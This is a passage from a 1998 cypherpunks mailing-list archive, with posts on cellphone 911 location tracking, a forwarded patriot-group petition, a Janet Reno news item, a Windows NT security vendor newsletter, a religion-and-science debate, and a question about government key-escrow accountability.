[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Sep 1998 17:33:19 +0800
To: cypherpunks@cyberpass.net
Subject: Calif Leads US with Mobile Tracker
Message-ID: <199809182234.SAA30415@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to John Gilmore.


http://www.msnbc.com/local/KNBC/14920.asp

CHP introduces cellular-friendly 911 system

Operators will now be able to capture the
telephone number and location of the caller
within a half-block area
 
LOS ANGELES, Sept. 17 - The California Highway Patrol
this week demonstrated a new countywide 911 system designed
to provide operators with the telephone numbers and
location of callers using mobile telephones.

Los Angeles County is the first in the state to use
the new technology, said CHP Sgt. Ernie Sanchez.
All local 911 calls for the CHP, whether via mobile
phones or "land lines," are routed to the CHP
half-a-millionCommunications Center just west of downtown, 
but mobile phone calls could not be traced until recently, 
Sanchez said.

"It doesn't matter if you live in Pasadena or Arcadia
or West Covina; if you call on a cell phone, that call will
go through the CHP Communications Center" and operators
will be able to capture the telephone number and location
of the caller within a half-block area, Sanchez said.

The enhanced technology has been in use for the past
three weeks, he said.

All major mobile phone companies are participating in
the test and demonstration of the system, Sanchez said,
adding that the technology should be in place nationwide by
2001 under Federal Communications Commission rules.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Fri, 18 Sep 1998 18:46:39 +0800
To: cypherpunks@cyberpass.net
Subject: Navajo Code Talkers
Message-ID: <36030CB8.2DD@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



The History Channel will broadcast an episode on the role of Navajo Code Talkers in 
WWII tonight at 8pm EST.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 18 Sep 1998 18:55:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: [Fwd: Petition for Redress] (fwd)
Message-ID: <199809190022.TAA06495@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From APFN@netbox.com Fri Sep 18 18:05:19 1998
Message-ID: <3602D946.291104DC@netbox.com>
Date: Fri, 18 Sep 1998 15:05:58 -0700
From: American Patriot Friends Network <APFN@netbox.com>
Reply-To: APFN@netbox.com
Organization: American Patriot Friends Network
X-Mailer: Mozilla 4.05 [en] (Win95; I)
MIME-Version: 1.0
To: "\"apfn@onelist.com\"" <apfn@onelist.com>
Subject: [Fwd: Petition for Redress]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

The question is, "Are we a nation of law?"   // Yes // No //
You are either on one side or the other, there is no in-between!
Without Justice, there is JUST_US!
http://www.freeyellow.com/members5/apfn/

Subject: [Fwd: Petition for Redress]
Date: Fri, 18 Sep 1998 14:47:01 -0700
From: American Patriot Friends Network <APFN@netbox.com>
Organization: American Patriot Friends Network
To: lorraine@pioche.com

Re: http://www.independentamericans.org/redress.htm
    Petition for Redress

Re: below info...

Subj: Plan to Restore... (APFN Web Page)

Can you please add this link to that APFN page...
http://www.esotericworldnews.com/planto.htm

---------------------------------------------------------------------

Subject: [TheEagle-L] Fwd: Petition for Redress
Date: Fri, 18 Sep 1998 16:49:20 EDT
From: Sagitt1@aol.com
Reply-To: theeagle-l@egroups.com
To: slane@moment.net, texnat57@gateway.net, dream@bga.com, TFIJDSHOW@aol.com,
     TBS <spicytoo@vvm.com>, TBS <rittprod@hotmail.com>,
     TBS <Rick.Habecker@rehab.state.tx.us>, TBS <ramshorn@hotmail.com>,
     TBS <mmoore6066@aol.com>, TBS <jcontra@onr.com>, truelaw@swbell.net,
     LORDFOUL28@aol.com, syncro2@flash.net, singer@ccms.net,
     mltaylor@freewwweb.com, Misty1941@aol.com, msf@texas.net,
     gene.ritter@mci2000.com, S62140Y@aol.com, PLanders@interserv.com,
     Jbyrd2@acad.stedwards.edu, patricia.warfel@austin.ppdi.com
CC: ANOTHER PATRIOT <SONS_OF_LIBERTY@webtv.net>,
     "Archibald Roberts Col." <comminc@webaccess.net>, BioFractal@aol.com,
     CENTRAL ALABAMA MILITIA <JHCAPT@aol.com>,
     Frances L Hartge <hartge1@juno.com>, Militia264@aol.com,
     JOHN DI NIARDO <jad@locust.etext.org>, Medesec@aol.com,
     "Mike & LaurieO'Donnell" <widawake@hotmail.com>, MilitiaNet@aol.com,
     "mrbill888@ycsi.net" <mrbill888@ycsi.net>,
     Patricia Neill <pnpj@db1.cc.rochester.edu>,
     SCOTTSDALE <njkoti@nji.com>, "snoball@idt.net" <snoball@idt.net>,
     SOUTHSANDY@aol.com, "spiff@netusa1.net" <spiff@netusa1.net>,
     TheVizor@aol.com, Yechiel Mann <yam@netvision.net.il>, HRomero@X25.net,
     tate <mtate@bledsoe.net>, Nicholas <faller@snowcrest.net>,
     Hoosier Reb <civil_rights48@hotmail.com>, Rosie <Rosie@merlinweb.com>,
     Norseman <kriegspfad@aol.com>, Wolfeyes <wolfeyes@cdsnet.net>,
     Partridge <rlpartridge@juno.com>, Matlock111@aol.com

If anyone out there is from Ohio...please respond to Lainnie, please.

In a message dated 9/18/98 3:42:37 PM Central Daylight Time,
lainnie@zoomnet.net writes:

<<
 I have a question and maybe someone out there can help me.
 I live in Southern Ohio.......and I have been thinking about trying to get
 an e-mail list going with others from Southern OHIO......to receive and
 exchange information on issues that involve
 the mistreatment of the people of S. Oh. by the systems.....political,human
 services,courts ,jails
 Constitutional issues etc.
 I am new at this and really have very little idea of how to go about
 establishing this e-mail
 connection.
 Is there anyone out there that can give suggestions or advice ?
 I'd appreciate so much your assistence.


 lainnie
  >>

    ---------------------------------------------------------------------

Subject: Re: Petition for Redress
Date: Fri, 18 Sep 1998 16:42:25 -0400 (EDT)
From: lainnie@zoomnet.net
To: Sagitt1@aol.com

At 04:19 PM 9/18/98 EDT, you wrote:
>You must all go to this web site and read this heart wrenching powerful
>Redress. If this doesn't get you off your couch, you are already dead.

>
>http://www.independentamericans.org/redress.htm
>Petition for Redress
>http://www.independentamericans.org/redress.htm
>
>Excellent..........just excellent!

I have a question and maybe someone out there can help me.
I live in Southern Ohio.......and I have been thinking about trying to get
an e-mail list going with others from Southern OHIO......to recieve and
exchange information on issues that involve the mistreatment of the 
people of S. Oh. by the systems.....political,human services,courts,
jails Constitutional issues etc.
I am new at this and really have very little idea of how to go about
establishing this e-mail connection.
Is there anyone out there that can give suggestions or advice ?
I'd appreciate so much your assistence.

lainnie

Media & Patriot Web Pages: (Bookmark)
http://home.rica.net/CaptainNemo/pers/patsites.htm

APFN
http://www.freeyellow.com/members5/apfn/

----------------------------------------------------------------------
CONTACTING CONGRESS:


+++ CONGRESS +++ U.S. CONGRESS - CALL 1-800-504-0031 OR 202-224-3121
                                      1-800-343-3222
>The new number is: 1-800-361-5222 (90001). When you call the number,
> follow the prompts. When asked for your 5 letter zip code, enter the
> number 90001. You will be connected to the main capitol switchboard.
> Just ask for the congressman or the senator you wish to speak to. If you
> enter your home zip code, you will be connected directly to your
> Congress "CRITTER". (Congressman or Senator)Posted:08/11/98

Contact Congress via the net - Elected Net:
http://www.hoboes.com/html/Politics/electednet/

Netline To Congress - Question of the Day
http://www.netline-to-congress.com/

The Best Congress Money Can Buy
http://mojones.com/COINOP_CONGRESS/data_viewer/data_viewer.html

SENATE:
http://www.senate.gov
SENATE EMAIL ADDRESS:
http://www.senate.gov/senator/membmail.html
http://www.senate.gov/senator/state.html
Senate Judiciary Committee members with contact information:
http://www.senate.gov/committee/judiciary.html
Senate - send email:
http://www.freecongress.org/jsmp/ContactSenators.htm
*** Letter to Senators:
http://members.foothills.net/ricefile/index.html

HOUSE OF REPRESENTATIVES - 
http://www.house.gov
House Of Representatives (EMAIL)
http://www.house.gov/writerep/
House Judiciary Committee members with contact information:
http://www.house.gov/judiciary/mem105.htm
HOUSE AS THE SPEAKER
http://speakernews.house.gov/asknewt/
QUICK SEARCH TEXT OF BILLS 105th CONGRESS:
http://thomas.loc.gov/home/thomas.html?66,9
HOUSE - DOWNLOADING BILL TEXT
http://thomas.loc.gov/home/billdwnloadhelp.html
CONTRACTING CONGRESS
http://www.visi.com/juan/congress/

----------------------------------------------------------------The moderator of the
apfn@egroups.com group
would like to invite you to join the group. 
Reply-To:  apfn-req-s6a1@egroups.com

If you join, you can read group messages in your e-mail
in-box or on the Web.
http://www.eGroups.com/list/apfn/

To accept this invitation, please use the "Send Reply"
to apfn-req-s6a1@egroups.com send back a blank message. 

Or you can accept by going to this Web location:

http://www.egroups.com/subscribe?list=apfn&vcode=6a1

If you have questions, please feel free to contact the 
moderator of this group at apfn@netbox.com or visit
http://www.eGroups.com/info/help.html 


"There can't be a crisis next week. My schedule is already full."
                            ~ Henry Kissinger ~

*=======================================================================*
  "It's the action, not the fruit of the action, that's important. You
  have to do the right thing.  It may not be in your power, may not be
  in your time, that there'll be any fruit.  But that doesn't mean you
  stop doing the right thing.  You may never know what results come from
  your action.  But if you do nothing, there will be no result."
                                -Gandhi
*=======================================================================*
       1 if by land, 2 if by sea.  Paul Revere - encryption 1775




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 18 Sep 1998 19:29:06 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Reno in contempt of Congress? [CNN]
Message-ID: <199809190054.TAA06601@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/ALLPOLITICS/stories/1998/09/17/reno.burton/

>    WASHINGTON (AllPolitics, Sept. 17) -- Rep. Dan Burton (R-Ind.) said
>    Thursday he intends to ask the full House to cite Attorney General
>    Janet Reno for contempt of Congress for refusing to turn over internal
>    documents related to the Justice Department's investigation into
>    alleged fund-raising irregularities during the 1996 election
>    campaign.. Burton Rep. Dan Burton 
>    
>    Burton chairs the House Reform and Oversight Committee, which has been
>    conducting its own investigation into allegations of campaign finance
>    abuses.
>    
>    In response, Reno said she was "disappointed" that Burton was pressing
>    ahead with a contempt citation, saying that she had made
>    "extraordinary accommodations" to supply Burton's committee with
>    information about the Justice Department's probe.

[text deleted]
    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Thompson" <jim@smallworks.com>
Date: Sat, 19 Sep 1998 01:36:55 +0800
To: <cypherpunks@toad.com>
Subject: Oh my God...
Message-ID: <002d01bde375$d5f31b80$7c7ecfc0@stewart.smallworks.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3996.1071713801.multipart/signed"

--Boundary..3996.1071713801.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Forgive me if this has been covered on cypherpunks.  I hang out on
coderpunks,
and this is far too political for that list.  Please keep me Cc'd on any
discussion
on this topic.

If true, RSA is dirty, SDI is dirty, Robertson Stevens is dirty, and Ron
Brown,
Jim Bizdos, Al Gore, John Huang and Sanford Robertson are going to jail.

http://www.worldnetdaily.com/smith/980915.comcs.html

Jim Thompson / Smallworks, Inc. / jim@smallworks.com
      512 338 0619 phone / 512 338 0625 fax
C++ is like jamming a helicopter inside a Miata and expecting some
sort of improvement.	    -- Drew Olbrich


--Boundary..3996.1071713801.multipart/signed
Content-Type: application/octet-stream; name="bin00006.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00006.bin"
Content-Description: "smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEH
AQAAoIIHtzCCAy4wggKXoAMCAQICEQDSdi6NFAw9fbKoJV2v7g11MA0GCSqG
SIb3DQEBAgUAMF8xCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5WZXJpU2lnbiwg
SW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMgUHJpbWFyeSBDZXJ0aWZp
Y2F0aW9uIEF1dGhvcml0eTAeFw05ODA1MTIwMDAwMDBaFw0wODA1MTIyMzU5
NTlaMIHMMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVy
aVNpZ24gVHJ1c3QgTmV0d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNv
bS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5IFJlZi4sTElBQi5MVEQoYyk5
ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRpdmlkdWFsIFN1
YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkMIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQC7WkSKBBa7Vf0DeootlE8VeDa4DUqyb5xUv7zodyqd
ufBou5XZMUFweoFLuUgTVi3HCOGEQqvAopKrRFyqQvCCDgLpL/vCO7u+yScK
XbawNkIztW5UiE+HSr8Z2vkV6A+HthzjzMaajn9qJJLj/OBluqexfu/J2zdq
yErICQbkmQIDAQABo3wwejARBglghkgBhvhCAQEEBAMCAQYwRwYDVR0gBEAw
PjA8BgtghkgBhvhFAQcBATAtMCsGCCsGAQUFBwIBFh93d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvUlBBMA8GA1UdEwQIMAYBAf8CAQAwCwYDVR0PBAQD
AgEGMA0GCSqGSIb3DQEBAgUAA4GBAIi4Nzvd2pQ3AK2qn+GBAXEekmptL/bx
ndPKZDjcG5gMB4ZbhRVqD7lJhaSV8Rd9Z7R/LSzdmkKewz60jqrlCwbe8lYq
+jPHvhnXU0zDvcjjF7WkSUJj7MKmFw9dWBpJPJBcVaNlIAD9GCDlX4KmsaiS
xVhqwY0DPOvDzQWikK5uMIIEgTCCA+qgAwIBAgIQEjURddbHnRZ+S25X8FwY
VjANBgkqhkiG9w0BAQQFADCBzDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4x
HzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3
dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5jb3JwLiBCeSBSZWYu
LExJQUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0Eg
SW5kaXZpZHVhbCBTdWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDAe
Fw05ODA3MjkwMDAwMDBaFw05OTA3MjkyMzU5NTlaMIIBEjEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdv
cmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEg
SW5jb3JwLiBieSBSZWYuLExJQUIuTFREKGMpOTgxHjAcBgNVBAsTFVBlcnNv
bmEgTm90IFZhbGlkYXRlZDE0MDIGA1UECxMrRGlnaXRhbCBJRCBDbGFzcyAx
IC0gTWljcm9zb2Z0IEZ1bGwgU2VydmljZTEVMBMGA1UEAxMMSmltIFRob21w
c29uMSEwHwYJKoZIhvcNAQkBFhJqaW1Ac21hbGx3b3Jrcy5jb20wXDANBgkq
hkiG9w0BAQEFAANLADBIAkEAnWxleUF/TVx+zohnvl4ZQRvlKSTE6e8vfLq+
z+FYFt6SmY8Ll6lBkEa5SWX53+siCbQBFtXnR9xXD3ANWMR9owIDAQABo4IB
XTCCAVkwCQYDVR0TBAIwADCBrwYDVR0gBIGnMIAwgAYLYIZIAYb4RQEHAQEw
gDAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29tL0NQUzBi
BggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlTaWdu
J3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcg
VmVyaVNpZ24AAAAAAAAwEQYJYIZIAYb4QgEBBAQDAgeAMIGGBgpghkgBhvhF
AQYDBHgWdmQ0NjUyYmQ2M2YyMDQ3MDI5Mjk4NzYzYzlkMmYyNzUwNjljNzM1
OWJlZDFiMDU5ZGE3NWJjNGJjOTcwMTc0N2RhNWQzZjIxNDFiZWFkYjJiZDJl
ODkyMTFhNTZjZjJkNjExNDk5YmEyYmE0NGZmZjNlYTQ1Y2UwDQYJKoZIhvcN
AQEEBQADgYEAUdXTXQRjeGZYgRWgtKwvYCqrjeA4Fo84K8S/WCNmCi18AlX4
t7zmsA+hRM6kun1vGrW5G/ANwWm2A27YBNjh/sd2Zi5dQ0as2QPeE7IR75jR
eL9Gurnr05FLPf3O4W7Iz5NotyF0PpGucBKPlw9dIXSAIO90xlhy3K+FPg5C
DBg=

--Boundary..3996.1071713801.multipart/signed
Content-Type: application/octet-stream; name="bin00005.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00005.bin"
Content-Description: "Jim Thompson.vcf"

QkVHSU46VkNBUkQKVkVSU0lPTjoyLjEKTjpUaG9tcHNvbjtKaW07OwpGTjpK
aW0gVGhvbXBzb24KT1JHOlNtYWxsV29ya3M7ClRJVExFOkNUTwpURUw7V09S
SztWT0lDRTooNTEyKSAzMzgtMDYxOQpURUw7SE9NRTtWT0lDRTooNTEyKSA0
NTItNTg0MgpURUw7Q0VMTDtWT0lDRTooNTEyKSA2NTctMTI3NApURUw7V09S
SztGQVg6KDUxMikgMzM4LTA2MjUKQURSO1dPUks6Ozs7Ozs7CkxBQkVMO1dP
Uks7RU5DT0RJTkc9UVVPVEVELVBSSU5UQUJMRTo9MEQ9MEEsICA9MEQ9MEEK
RU1BSUw7UFJFRjtJTlRFUk5FVDpqaW1Ac21hbGx3b3Jrcy5jb20KUkVWOjE5
OTgwNzIwVDE1NDU0M1oKRU5EOlZDQVJECg==
--Boundary..3996.1071713801.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inform@trustedsystems.com
Date: Fri, 18 Sep 1998 22:06:48 +0800
To: cypherpunks@toad.com
Subject: Trusted Systems Services Newsletter
Message-ID: <199809190303.WAA24054@duracef.shout.net>
MIME-Version: 1.0
Content-Type: text/plain




***************************************************************

************* Trusted Systems Services Newsletter *************

                       17 September 98
                 http://www.trustedsystems.com


Thanks for your past interest in Trusted Systems Services. We've sincerely been overwhelmed by the response to our "Windows NT Security Guidelines Report for NSA Research" give-away as well as our Super CACLS networking administrators software tool and wanted to let you know what we've been up to lately. 


          ** Addenda & Errata Web Site for Windows NT Security Guidelines

          ** Super CACLS Report

          ** Advanced Checker Status Report
             (formerly known as Checker or Super Checker)

          ** Trusted Systems Services Selected by Microsoft  
             To Review Configurations for Securing Windows NT


We'd like to send occasional announcements, but if you want to be removed from our list, please tell us. (To unsubscribe, just send a reply to this e-mail with the word "unsubscribe" as the Subject.)


***************************************************************

           ADDENDA & ERRATA WEB SITE FOR WINDOWS NT      
                     SECURITY GUIDELINES

We now have an Addendad and Errata web page for our Windows NT Security Guidelines. We highly recommend you periodically visit this page, especially if you are actively using these guidelines. Some of the addenda topics include "Limiting Installers in the WINNT & Registry ACL Settings," "Minimizing Services & Stolen Service Password," and "Software Installation that "Moves" New Items into Protected Directories." http://www.trustedsystems.com/NSAGuideAdd.htm


***************************************************************

                      SUPER CACLS REPORT                     

The latest version of Super CACLS is version 2.52. If you've licensed an earlier version, you can receive a free upgrade from our web site by using your update code. Trusted Systems Services (and Super CACLS) have been selected to be a security sponsor of the upcoming 1998 Compaq Grand Slam Tennis Cup to be held in Munich, Germany this month. Super CACLS was used to set up the network for all journalists in the Olympic Hall. Stefan Werner, Chief Technical Officer for this event said, "We like Super CACLS because of its enhanced and easy-to-use features in modifying ACLs for securing NT-mass-rollouts." If you haven't tried Super CACLS, you're invited to try our full demo available at : http://www.trustedsystems.com/SCACLSMain.htm

***************************************************************     

                ADVANCED CHECKER STATUS REPORT      
         (formerly known as Checker or Super Checker)

Our newest networking security tool, Advanced Checker, is in the formal testing phase. Advanced Checker is a fully-featured, programmable scripting language that checks, and in some cases corrects, the security attributes of a Windows NT Server or Workstation. Advanced Checker lets you create simple "scripts" in text files using any text editor. You then run Advanced Checker which reads the scripts and performs its security checks. The security parameters it checks include the ACL's of files and directories on NTFS file systems, Registry keys and share directories, audit SACL's, registry values, audit policy, rights policy and more. 

We believe that Advanced Checker will fundamentally change the way that beginning and especially advanced networking administrators monitor and manage the security of their networks. It gives you unprecedented power and flexibility in an easy-to-use package that we are committed to expand and improve through feedback from our customers. We hope you'll give this product a try when it debuts later this year. For a complete description: http://www.trustedsystems.com/AdvancedChecker.htm 

***************************************************************

       TSS SELECTED BY MICROSOFT TO REVIEW CONFIGURATIONS  
                   FOR SECURING WINDOWS NT 

URBANA, IL September 1, 1998  Trusted Systems Services, Inc. announced today that Microsoft has selected them to perform an independent, detailed review and analysis of the recommended Security Configurations for securing Windows NT-based systems. TSS will undertake a thorough analysis of the broad range of Windows NT-based systems security settings that typical users of Windows NT apply to secure their systems.  These recommendations will help administrators to secure their Windows NT-based systems using the Security Configuration Editor tool that is part of Windows NT 4.0 Service Pack 4. 

"Trusted Systems has practical experience in securing Windows NT-based systems," said Peter Brundrett, Windows NT Security Program Manager at Microsoft Corp. "Our customers will be able to use the results of this analysis to secure their Windows NT-based systems." For the complete press release, go to: http://www.trustedsystems.com/SCTS.htm


***************************************************************

This message was sent to you by Advanced Checker.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 21:30:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: BAN DOGS..
In-Reply-To: <v0401171fb228804644bd@[139.167.130.247]>
Message-ID: <v04011729b228c44e42ed@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



All of this reminds me of my favorite Vinnie Moscaritolo quote:

"If we could just pass a few more laws, we could *all* be criminals!"

:-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 21:30:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cyberpunks Signal-to-Noise Ratio
In-Reply-To: <19980919012849.4800.qmail@hades.rpini.com>
Message-ID: <v0401172ab228c4f76ac8@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:28 PM -0400 on 9/18/98, Anonymous wrote:
> Quoting Tim May (tcmay@got.net):
> > And that proceeds in spurts, not surprisingly, as topics come to the fore.
> Are you seriously advocating further discussion of Clinton's penis?
Hmmm... Speaking of noise to signal, I feel a, um, cascade, um, coming on...
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 15:31:18 +0800
To: 5j0g50e0@auto.sixdegrees.com
Subject: Re: Hacker D00D
Message-ID: <199809182026.WAA06050@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hey, fuck you!  Maybe Hacker D00D is the mother I always wanted!
Go stick your head in a fucking incinerator!


At 12:49 PM 9/18/98 -0700, I.A. Eaglemail wrote:
>DENY
>
>>From cypherpunks-errors@toad.com Fri Sep 18 12:23:32 1998
>>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id 
>MAA22376 for cypherpunks-unedited-outgoing; Fri, 18 Sep 1998 12:16:52 
>-0700 (PDT)
>>Received: from neptune.sixdegrees.com (neptune.sixdegrees.com 
>[206.41.12.34]) by toad.com (8.7.5/8.7.3) with SMTP id MAA22371 for 
><cypherpunks@toad.com>; Fri, 18 Sep 1998 12:16:49 -0700 (PDT)
>>Message-Id: <199809181916.MAA22371@toad.com>
>>Date: Fri, 18 Sep 1998 15:15:42 -0500
>>From: "sixdegrees"<5j0g50e0@auto.sixdegrees.com>
>>To: "Joe Cyberspanker"<cypherpunks@toad.com>
>>Subject:  Hacker D00D
>>Sender: owner-cypherpunks@toad.com
>>Precedence: bulk
>>
>>You've been listed again. Looks like this whole sixdegrees 
>>thing is working. Your networking potential is growing by the 
>>second. Hacker D00D listed you as "Mother."
>>
>>Please let us know if you are in fact Hacker's Mother:
>>
>>====================================================================
>>TO RESPOND:
>>
>>FIRST, click your mail program's reply button. 
>>
>>SECOND, in the reply e-mail that opens, on the first line of 
>>the message body, type only the word CONFIRM or the word DENY.
>>
>>THEN CLICK SEND.
>>
>>If you prefer, you can take care of this contact confirmation 
>>by visiting the site at http://www.sixdegrees.com and going to 
>>MY CONTACTS after logging in on the home page. You can also list 
>>new contacts there.
>>
>>We look forward to hearing from you.
>>
>>====================================================================
>>PLEASE NOTE: All replies to this address are processed by a computer.
>>If you have any problems, questions or requests send an e-mail to 
>>issues@sixdegrees.com and someone will get back to you as soon as 
>>possible.
>>====================================================================
>>
>>
>>E.DB.ANB.4
>>
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Fri, 18 Sep 1998 17:47:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Democracy... (fwd) The Nature of Religion
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AD@mossbay.chaffeyhomes.com>
Message-ID: <3602E3DA.91CC48D4@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Michael Motyka wrote:
> 
> Michael Hohensee wrote:
> >
> > Actually, you may be interested to know that *everyone* is religious, in
> > some manner.  Everyone has at least one untestable assumption about the
> > world.  That is, everyone has a kind of faith.  Let's give some
> > examples:
> >
> > Christians believe that there exists a Being, called God, which somehow
> > Moslems believe in the existance of a different God, and have different
> > Atheists believe that God *doesn't* exist, which is essentially the same
> > Even people who are nonreligious, or agnostic, have a religion.  For
> > The Transcendentalists of the 19th century, for example, do not really
> > Scientists tend to think differently.  Their beliefs can be described by
> 
> Lots of scientists look pretty religious about their 'science' to me.

I believe that I said that.  We religiously believe that the universe
exists, but, since we're honest with ourselves, we admit that we can't
prove it, and simply choose to act under the assumption that it is real.
(after all, that model seems to work pretty well)

> Their untestable assumption being that they are capable of comprehending
> what may be beyond them. 

No.  All we assume is that the universe exists.  Whether or not we can
fully comprehend everything about how it works is another question
entirely.  We currently understand all kinds of interesting things about
how the universe works, but no one says that that's everything.  If
something is physically beyond our understanding, then of course we
won't be able to understand it,  but we haven't hit such a wall yet. 
Who knows, if we ever do hit that wall, we may be able to build machines
which can help us understand (or at least take advantage of) things
beyond that wall.

I'd say to worry about it when we come to it. :)

> I'm now an avowed Apatheist - I don't give a damn what the answers to
> unanswerable questions are. Especially when those answers come from
> someone with an obvious agenda. Is that religious?
>
> Put a worm on the hook, pop the top off my beer. Argh! It's Coors. I
> only wish it were imaginary. If not Guiness, at least let it be a
> Corona.

So you do believe (or at least act under the assumption) that the
universe is real, then? ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Whtsametau@aol.com
Date: Fri, 18 Sep 1998 22:06:00 +0800
To: Coolness <cypherpunks@toad.com>
Subject: Guess Who!
Message-ID: <58adfa62.36031df2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



It's Me!  Stan!

I need technical advice this time.  How does one write to a newsgroup via e-
mail?

Thanks in advance, cyphers!

And check out my Brave Combo discography again, I'm sure I've had some
interesting upgrades since I was last here,

Stan Rosenthal,
Stan and the Sequencers
members.aol.com/StanSqncrs/

Stan's Brave Combo discography
members.aol.com/whtsametau/BraveCombo/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sat, 19 Sep 1998 01:26:46 +0800
To: Robert Hettinga <dcsb@ai.mit.edu
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <v0311072ab229065d9a73@[209.109.235.154]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:38 PM -0800 9/17/98, Robert Hettinga wrote:
>Anyway, In light of more recent crypto-shenanigans from Billary, and the
>fact that this thing's a small crowd, I figured I'd ask if anyone on these
>lists had a question they wanted me to ask him.

Probably a bit late, but I would ask, "If the government is going to
require GAK, how is it going to demonstrate that all the keys is accessed
were accessed according to legal proceedings?"  Another way of asking is,
"How do we ensure that all government accesses to keys become publicly
known within a reasonable amount of time."  (I would define reasonable as
much less than 5 years.)

(I've been reading David Brin's "The Transparent Society".)


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
